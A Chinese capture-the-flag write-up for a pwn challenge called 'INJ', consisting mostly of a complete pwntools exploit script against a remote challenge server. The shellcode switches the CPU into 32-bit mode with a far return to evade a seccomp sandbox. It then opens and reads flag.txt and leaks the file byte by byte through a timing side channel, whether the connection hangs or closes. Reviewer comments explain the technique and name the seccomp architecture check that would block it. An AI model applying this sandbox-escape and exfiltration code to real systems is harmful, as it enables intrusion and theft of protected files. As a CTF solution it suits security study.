上去看的时候队里的其他师傅已经把PWN写得只剩一题了,然后就半摆烂地把PWN最后那道INJ写了,最后也是被队里的大佬们带飞拿了第一。

1st place!

INJ

题目的沙箱

利用shellcode切换至32位进行ORB,需要注意的是远程open返回的文件描述符可能不是3,需要用 mov ebx, eax 来设置read的fd

#!/usr/bin/python2
from pwn import *

context.binary = 'inj'


def sd(x):
    """Send ``x`` on the module-level tube ``io`` (bound by ``pwn``)."""
    return io.send(x)


def sa(a, b):
    """Wait until ``a`` has been received on ``io``, then send ``b``."""
    return io.sendafter(a, b)

def pwn(ch):
    """Ask the remote once whether the flag byte at index len(flag) is ``ch``.

    A fresh connection is opened and two shellcode stages are sent. The
    answer is read off the connection's behaviour rather than its output:
    if ``io.recv(timeout=1)`` simply times out, stage 2 is spinning in its
    compare loop (byte matched) and ``ch`` is appended to the global
    ``flag``; if the connection is torn down first (EOFError), stage 2 fell
    through to ``ret`` (no match).

    Side effects: rebinds the module-level ``io`` on every call, extends the
    module-level ``flag`` on success, and closes the tube on both paths.

    NOTE(review): the technique depends on the challenge sandbox treating
    32-bit ``int 0x80`` syscalls differently from 64-bit ``syscall`` ones.
    A seccomp policy should check ``seccomp_data.arch`` (or kill on an
    unexpected arch) instead of filtering on syscall number alone. The
    sandbox itself is not shown on this page, so this is inferred from the
    payload.

    Args:
        ch: one candidate character for position len(flag).

    Returns:
        True when ``ch`` was accepted as the next flag byte, else False.
    """
    global io
    global flag
    # io = process('./inj')
    io = remote('35.233.85.116', 30020)
    # Stage 1, executed as 64-bit code. Only the low byte of rax is set before
    # the first syscall, so the number actually used depends on rax's upper
    # bytes on entry (0xa is mprotect on x86-64 when they are zero; with
    # rdi=rsi=0x404000 and rdx=7 that reads as mprotect(0x404000, 0x404000,
    # RWX) -- confirm against the binary). The stack is then relocated to
    # 0x4043E0, the encoding of `int 0x80` (0xcd 0x80) is pushed there, and
    # `retfq` far-returns to it with CS=0x23, the 32-bit compat code segment.
    # `add al, 3` selects the 32-bit syscall number that `int 0x80` then
    # issues; rbx/rdx are not set explicitly here.
    code = '''
mov al, 0xa
mov edi, 0x0000000000404000
mov esi, edi
push 7
pop rdx
syscall
pop rdx
mov esp, 0x00000000004043E0
pop rax
push 0x80cd
mov ecx, esp
push 0x23
push rcx
add al, 3
retfq
'''
    code = asm(code)
    # raw_input()
    sa('Welcome to my code executor!', code)
    # Stage 2 runs in 32-bit mode (it is still assembled with context.arch,
    # taken from context.binary above). It opens "flag.txt" -- built on the
    # stack from two dword pushes, flags 0 = O_RDONLY -- then reads 0x50
    # bytes from the returned fd into 0x4045E0; `mov ebx, eax` is what makes
    # this work when the fd is not 3. It then far-returns with CS=0x33 back
    # to 64-bit code at 0x404418 (presumably the `loop:` label) and spins
    # forever if byte len(flag) of the buffer equals ord(ch); otherwise it
    # falls through to `ret`, and the process is expected to die (inferred
    # from the EOFError path below).
    code = '''
mov eax, 5
push 0
push 0x7478742e
push 0x67616c66
mov ebx, esp
mov ecx, 0
int 0x80
mov ebx, eax
mov eax, 3
mov ecx, 0x00000000004045E0
mov edx, 0x50
int 0x80
push 0x33
push 0x404418
retfq
loop:
mov rsi, 0x4045e0
cmp byte ptr[rsi+{0}], {1}
je loop
ret
'''.format(len(flag), ord(ch))
    # The two 'a' bytes land on the planted `int 0x80` and are skipped once
    # that instruction has executed (inferred from the stack layout stage 1
    # sets up).
    code = 'aa' + asm(code)
    # raw_input()
    # Presumably gives stage 1 time to reach its blocking read first.
    sleep(1)
    sd(code)
    try:
        # A pwntools recv timeout returns quietly; a closed connection raises.
        io.recv(timeout = 1)
        flag += ch
        io.close()
        return True
    except:
        # NOTE(review): a bare except also traps KeyboardInterrupt and
        # SystemExit; the only expected failure here is EOFError.
        io.close()
        return False

flag = ''
table = 'abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890{}-_@$&*!?.'
# Recover the flag one byte at a time: each pwn() call is a single yes/no
# query for the candidate at position len(flag). A full pass over the
# alphabet with no match simply starts again, so the loop only ends once
# the recovered string ends in '}'.
while not flag.endswith('}'):
    for ch in table:
        sleep(0.25)
        info('current flag: ' + flag)
        info('trying(' + ch + ')')
        if not pwn(ch):
            continue
        success('success(' + ch + ')')
        break
success('final flag: ' + flag)